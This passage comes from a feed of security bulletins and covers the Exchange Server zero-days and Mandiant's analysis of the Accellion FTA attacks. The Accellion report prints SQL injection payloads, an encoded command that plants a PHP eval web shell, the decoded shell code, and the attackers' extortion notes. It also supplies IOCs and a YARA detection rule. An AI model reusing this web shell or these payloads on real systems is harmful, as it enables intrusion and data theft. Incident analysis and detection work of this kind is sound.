determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-07-28T16:40:37", "description": "Starting in mid-December 2020, malicious actors that Mandiant tracks as UNC2546 exploited multiple zero-day vulnerabilities in Accellion\u2019s legacy File Transfer Appliance (FTA) to install a newly discovered web shell named DEWMODE. The motivation of UNC2546 was not immediately apparent, but starting in late January 2021, several organizations that had been impacted by UNC2546 in the prior month began receiving extortion emails from actors threatening to publish stolen data on the \u201cCL0P^_- LEAKS\" .onion website. Some of the published victim data appears to have been stolen using the DEWMODE web shell.\n\nNotably, the number of victims on the \u201cCL0P^_- LEAKS\" shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada, and the Netherlands recently outed by these threat actors. Mandiant has previously reported that FIN11 has threatened to post stolen victim data on this same .onion site as an additional tactic to pressure victims into paying extortion demands following the deployment of CLOP ransomware. However, in recent CLOP extortion incidents, no ransomware was deployed nor were the other hallmarks of FIN11 present.\n\nWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582. We have identified overlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity. For more information on our use of \u2018UNC\u2019 designations, see our blog post, \"DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\"\n\nMandiant has been working closely with Accellion in response to these matters and will be producing a complete security assessment report in the coming weeks. At this time, [Accellion has patched all FTA vulnerabilities](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>) known to be exploited by the threat actors and has added new monitoring and alerting capabilities to flag anomalies associated with these attack vectors. Mandiant has validated these patches. Mandiant is currently performing penetration testing and code review of the current version of the Accellion FTA product and has not found any other critical vulnerabilities in the FTA product based on our analysis to date. Accellion customers using the FTA legacy product were the targets of the attack.\n\nAccellion FTA is a 20-year-old product nearing end of life. Accellion strongly recommends that [FTA customers migrate to kiteworks](<https://www.accellion.com/products/fta/>), Accellion\u2019s [enterprise content firewall](<https://www.accellion.com/>) platform. Per Accellion, Kiteworks is built on an entirely different code base.\n\nThe following CVEs have since been reserved for tracking the recently patched Accellion FTA vulnerabilities:\n\n * [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) \\- SQL injection via a crafted Host header\n * [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) \\- OS command execution via a local web service call\n * [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) \\- SSRF via a crafted POST request\n * [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) \\- OS command execution via a crafted POST request\n\n#### UNC2546 and DEWMODE\n\nIn mid-December 2020, Mandiant responded to multiple incidents in which a web shell we call DEWMODE was used to exfiltrate data from Accellion FTA devices. The Accellion FTA device is a purpose-built application designed to allow an enterprise to securely transfer large files. The exfiltration activity has affected entities in a wide range of sectors and countries.\n\nAcross these incidents, Mandiant observed common infrastructure usage and TTPs, including exploitation of FTA devices to deploy the DEWMODE web shell. Mandiant determined that a common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546's activities.\n\n#### Evidence of Exploitation and DEWMODE Installation\n\nMandiant has been able reconstruct many of the details about how Accellion FTAs have been compromised through examination of Apache and system logs from impacted devices\u2014from initial compromise, to deployment of DEWMODE, and follow-on interaction.\n\nThe earliest identification of activity associated with this campaign occurred in mid-December 2020. At this time, Mandiant identified UNC2546 leveraging an SQL injection vulnerability in the Accellion FTA. This SQL injection served as the primary intrusion vector.\n\nMandiant observed evidence of SQL injection followed by subsequent requests to additional resources, as shown in Figure 1.\n\n[21/Dec/2020:18:14:32 +0000] [.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass through /courier/document_root.html\n\n[21/Dec/2020:18:14:33 +0000] ['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /courier/document_root.html\n\n[21/Dec/2020:18:14:33 +0000] [.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1) pass through /courier/document_root.html\n\n[21/Dec/2020:18:14:34 +0000] [&lt;redacted&gt;/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php\n\n[21/Dec/2020:18:14:35 +0000] [&lt;redacted&gt;/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api\n\n[21/Dec/2020:18:14:35 +0000] [&lt;redacted&gt;/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api \n \n--- \n \nFigure 1: SQL injection log\n\nUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php. Immediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api.\n\nPWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F \n\\--mount_cifs=- \nV,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm \nFzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd \nXNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG \nVhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;\",PASSWORD # \\\" --passwd=pop \n--- \n \nFigure 2: Excerpt from log showing creation of eval web shell\n\nThe decoded contents are shown in Figure 3.\n\n&lt;?php\n\nif(isset($_REQUEST['token'])) \n{ \neval(base64_decode($_REQUEST['token'])); \n} \nelse if(isset($_REQUEST['username'])) \n{ \nsystem($_REQUEST['username']); \n} \nelse \n{ \nheader('Location: /'); \n} \n \n--- \n \nFigure 3: Decoded eval web shell\n\nAlmost immediately following this sequence, the DEWMODE web shell is written to the system. The timing of these requests suggests that DEWMODE was delivered via the oauth.api web shell; however, the available evidence does not indicate the exact mechanism used to write DEWMODE to disk.\n\nMandiant has identified the DEWMODE web shell in one of the following two locations:\n\n * /home/seos/courier/about.html\n * /home/httpd/html/about.html\n\nThe DEWMODE web shell (Figure 4) extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader, and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell. Download requests are captured in the FTA\u2019s web logs, which will contain requests to the DEWMODE web shell with encrypted and encoded URL parameters, where dwn is the file path and fn is the requested file name (Figure 5). The encrypted file path and name values visible in web logs can be decrypted using key material obtained from the database used by the targeted FTA. Given the complex nature of this process, if your organization needs assistance reviewing relevant logs, please contact Mandiant or Accellion.\n\n \nFigure 4: DEWMODE web shell screenshot\n\nGET /courier/about.html?dwn=[REDACTED]&amp;fn=[REDACTED] HTTP/1.1\" 200 1098240863 \"-\" \"-\" \"-\" TLSv1.2 ECDHE-RSA-AES128-SHA256 \n--- \n \nFigure 5: DEWMODE File Download URL parameters\n\nFollowing file downloads, UNC2546 initiates a cleanup routine by passing a specific query parameter named csrftoken with the value 11454bd782bb41db213d415e10a0fb3c to DEWMODE. The following actions are performed:\n\n * A shell script is written to /tmp/.scr, which will:\n * Remove all references to about.html from log files located in /var/opt/apache/\n * Write the modified log file to /tmp/x then replace the original log file at /var/opt/apache/\n * Delete the contents of the /home/seos/log/adminpl.log log file.\n * Remove /home/seos/courier/about.html (DEWMODE) and /home/seos/courier/oauth.api (eval web shell), and redirect command output to the file /tmp/.out\n * Change the permissions of the output file to be readable, writeable and executable by all users, and set the owner to \u201cnobody\u201d\n * Delete the script file /tmp/.scr and other temporarily created files to assist in cleanup\n * Display cleanup output to the requesting user\n\nAn example of a cleanup request and subsequent execution of the cleanup script can be seen in Figure 6.\n\nGET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1\" 200 5 \"-\" \"https://[REDACTED]//courier/about.html?aid=1000\" \"Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101\n\nsft sudo: nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF,DF,'$(sh /tmp/.scr)',PASSWORD \n \n--- \n \nFigure 6: DEWMODE cleanup request\n\nMandiant also identified a variant of DEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) which contained minor changes to the cleanup operation, including wiping of /var/log/secure and removing about.html and oauth.api from the directories /home/httpd/html/ instead of /home/seos/courier/.****\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz (Figure 7). Based on temporal file access to the mysqldump utility and mysql data directories, the archive likely contained a dump of the database. With the exception of cache.js.gz, Mandiant has not observed UNC2546 acquiring files from Accellion appliances through any method besides DEWMODE.\n\nGET //courier/cache.js.gz HTTP/1.1\" 200 35654360 \"-\" \"-\" \"python-requests/2.24.0\" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \n--- \n \nFigure 7: cache.js.gz file request\n\n#### UNC2582 Data Theft Extortion\n\nShortly after installation of the web shell, in multiple cases within hours, UNC2546 leveraged DEWMODE to download files from compromised FTA instances. While the actors\u2019 motivations were not immediately clear, several weeks after delivery of the DEWMODE web shell, victims began to receive extortion emails from an actor claiming association with the CLOP ransomware team (Figure 8 and Figure 9). The actors threatened to publish data on the \"CL0P^_- LEAKS\" .onion shaming website, unless the victim paid an extortion fee. We are tracking the subsequent extortion activity under a separate threat cluster, UNC2582. Despite tracking the exploitation and extortion activity in separate threat clusters we have observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send UNC2582-attributed extortion email.\n\nHello!\n\nYour network has been hacked, a lot of valuable data stolen. &lt;description of stolen data, including the total size of the compressed files&gt; We are the CLOP ransomware team, you can google news and articles about us. We have a website where we publish news and stolen files from companies that have refused to cooperate. Here is his address http://[redacted].onion/ - use TOR browser or http://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers and competitors every day. We suggest that you contact us via chat within 24 hours to discuss the current situation. &lt;victim-specific negotiation URL&gt; \\- use TOR browser We don't want to hurt, our goal is money. We are also ready to provide any evidence of the presence of files with us. \n \n--- \n \nFigure 8: Extortion Note Template 1\n\nThis is the last warning!\n\nIf you don\u2019t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our site), send messages to all the emails that we received from your files. Due to the fact that journalists and hackers visit our site, calls and questions will immediately begin, online publications will begin to publish information about the leak, you will be asked to comment.\n\nDo not let this happen, write to us in chat or email and we will discuss the situation!\n\nCHAT: &lt;victim-specific negotiation URL&gt;\n\nEMAIL: unlock@support-box.com\n\nUSE TOR BROWSER! \n \n--- \n \nFigure 9: Extortion Note Template 2\n\nBased on observations at several engagements, UNC2582 appears to follow a pattern of escalation to pressure victims into paying extortion demands. Initial emails are sent from a free email account, likely unique per victim, to a seemingly limited distribution of addresses at the victim organization. If the victim does not respond in a timely manner, additional emails are sent to a much larger number of recipients from hundreds or thousands of different email accounts and using varied SMTP infrastructure. In at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat. Monitoring of the CL0P^_- LEAKS shaming website has demonstrated that UNC2582 has followed through on threats to publish stolen data as several new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted.\n\n#### Key Overlaps With FIN11\n\n_UNC2582 (Extortion) and FIN11_\n\nMandiant identified overlaps between UNC2582\u2019s data theft extortion activity and prior [FIN11](<https://www.fireeye.comhttps://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html>) operations, including common email senders and the use of the CL0P^_- LEAKS shaming site. While FIN11 is known for deploying CLOP ransomware, we have previously observed the group conduct data theft extortion without ransomware deployment, similar to these cases.\n\n * Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group.\n * We have not observed FIN11 phishing activity in the new year. FIN11 has typically paused their phishing operations over the winter holidays and had several extended gaps in their operations. However, the timing of this current hiatus is also consistent with UNC2582\u2019s data theft extortion activity.\n * UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page. The linked websites were the same ones used to support historical CLOP operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\n\n_UNC2546 (FTA Exploitation and DEWMODE) and FIN11_\n\nThere are also limited overlaps between FIN11 and UNC2546.\n\n * Many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n * An IP address that communicated with a DEWMODE web shell was in the \"Fortunix Networks L.P.\" netblock, a network frequently used by FIN11 to host download and FRIENDSPEAK command and control (C2) domains.\n\n#### Implications\n\nThe overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks. We therefore have insufficient evidence to attribute the FTA exploitation, DEWMODE, or data theft extortion activity to FIN11. Using SQL injection to deploy DEWMODE or acquiring access to a DEWMODE shell from a separate threat actor would represent a significant shift in FIN11 TTPs, given the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities. \n\n#### Acknowledgements\n\nDavid Wong, Brandon Walters, Stephen Eckels and Jon Erickson\n\n#### Indicators of Compromise (IOCs)\n\n_DEWMODE Web Shells_\n\n**MD5**\n\n| \n\n**SHA256** \n \n---|--- \n \n2798c0e836b907e8224520e7e6e4bb42\n\n| \n\n5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b \n \nbdfd11b1b092b7c61ce5f02ffc5ad55a\n\n| \n\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7 \n \n_UNC2546 Source IP Addresses_\n\nThe following source IP addresses were observed in multiple UNC2546 intrusions:\n\n * 45.135.229.179\n * 79.141.162.82\n * 155.94.160.40\n * 192.154.253.120\n * 192.52.167.101\n * 194.88.104.24\n\n#### Detections\n\n_FireEye Detections_\n\n * FE_Webshell_PHP_DEWMODE_1\n * FEC_Webshell_PHP_DEWMODE_1\n * Webshell.PHP.DEWMODE\n\n_Mandiant Security Validation_\n\n * A101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1\n * A101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2\n\n_DEWMODE YARA Rule_\n\nThe following YARA rule is not intended to be used on production systems or to inform blocking rules without first being validated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of false positives. This rule is intended to serve as a starting point for hunting efforts to identify DEWMODE payloads; however, it may need adjustment over time if the malware family changes.\n\nrule DEWMODE_PHP_Webshell \n{ \nstrings: \n$s1 = /if \\\\(isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]dwn[\\x22\\x27]]\\\\)[\\x09\\x20]{0,32}&amp;&amp;[\\x09\\x20]{0,32}isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]fn[\\x22\\x27]\\\\]\\\\)\\\\)\\s{0,256}\\\\{/ \n$s2 = \"&lt;th&gt;file_id&lt;/th&gt;\" \n$s3 = \"&lt;th&gt;path&lt;/th&gt;\" \n$s4 = \"&lt;th&gt;file_name&lt;/th&gt;\" \n$s5 = \"&lt;th&gt;uploaded_by&lt;/th&gt;\" \n$s6 = \"target=\\\\\\\\\\\"_blank\\\\\\\\\\\"&gt;Download&lt;/a&gt;&lt;/td&gt;\" \n$s7 = \"Content-Type: application/octet-stream\" \n$s8 = \"Content-disposition: attachment; filename=\" \ncondition: \nall of them \n} \n---\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T14:00:00", "type": "fireeye", "title": "Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T14:00:00", "id": "FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "href": "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:55:32", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \n**CVE-2021-26855**\n\n| \n\nCritical\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004941>) \n \n**CVE-2021-26857**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004938>) \n \n**CVE-2021-26858**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004944>) \n \n**CVE-2021-27065**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004939>) \n \nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. [Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity. \n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistent mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address:\n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Note** \n \n---|---|--- \n \n165.232.154.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/02 02:43 \n \n182.18.152.105\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 16:16 \n \n##### UNC2640\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5** \n \n---|---|--- \n \nhelp.aspx\n\n| \n\nFile: Web shell\n\n| \n\n4b3039cf227c611c45d2242d1228a121 \n \niisstart.aspx\n\n| \n\nFile: Web shell\n\n| \n\n0fd9bffa49c76ee12e51e3b8ae0609ac \n \n##### UNC2643\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5/Note** \n \n---|---|--- \n \nCobalt Strike BEACON\n\n| \n\nFile: Shellcode\n\n| \n\n79eb217578bed4c250803bd573b10151 \n \n89.34.111.11\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:06 \n \n86.105.18.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:39 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| 